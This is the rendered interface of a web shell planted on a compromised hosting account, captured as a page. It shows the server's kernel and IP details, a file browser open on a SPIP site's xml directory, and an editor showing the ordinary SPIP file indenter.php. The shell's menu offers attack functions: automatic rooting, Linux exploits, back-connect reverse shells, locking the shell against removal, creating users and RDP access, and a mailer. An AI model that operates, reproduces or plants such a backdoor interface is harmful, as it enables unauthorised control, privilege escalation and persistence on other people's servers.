Linux webm008.cluster115.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.115.20.8 | : 216.73.216.59
Cant Read [ /etc/named.conf ]
8.1.34
quelfutuu
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
quelfutuu /
www /
grice /
ecrire /
xml /
[ HOME SHELL ]
Name
Size
Permission
Action
analyser_dtd.php
10.79
KB
-rw----r--
indenter.php
1.77
KB
-rw----r--
index.php
2
B
-rw----r--
interfaces.php
1.96
KB
-rw----r--
sax.php
8.41
KB
-rw----r--
valider.php
10
KB
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : indenter.php
<?php /***************************************************************************\ * SPIP, Système de publication pour l'internet * * * * Copyright © avec tendresse depuis 2001 * * Arnaud Martin, Antoine Pitrou, Philippe Rivière, Emmanuel Saint-James * * * * Ce programme est un logiciel libre distribué sous licence GNU/GPL. * \***************************************************************************/ if (!defined('_ECRIRE_INC_VERSION')) { return; } class IndenteurXML { public function debutElement($phraseur, $name, $attrs) { xml_debutElement($this, $name, $attrs); } public function finElement($phraseur, $name) { xml_finElement($this, $name); } public function textElement($phraseur, $data) { xml_textElement($this, $data); } public function piElement($phraseur, $target, $data) { xml_PiElement($this, $target, $data); } public function defaultElement($phraseur, $data) { xml_defaultElement($this, $data); } public function phraserTout($phraseur, $data) { xml_parsestring($this, $data); } public $depth = ''; public $res = ''; public $err = []; public $contenu = []; public $ouvrant = []; public $reperes = []; public $entete = ''; public $page = ''; public $dtc = null; public $sax = null; } function xml_indenter_dist($page, $apply = false) { $sax = charger_fonction('sax', 'xml'); $f = new IndenteurXML(); $sax($page, $apply, $f); if (!$f->err) { return $f->entete . $f->res; } spip_log('indentation impossible ' . (is_countable($f->err) ? count($f->err) : 0) . ' erreurs de validation'); return $f->entete . $f->page; }
Close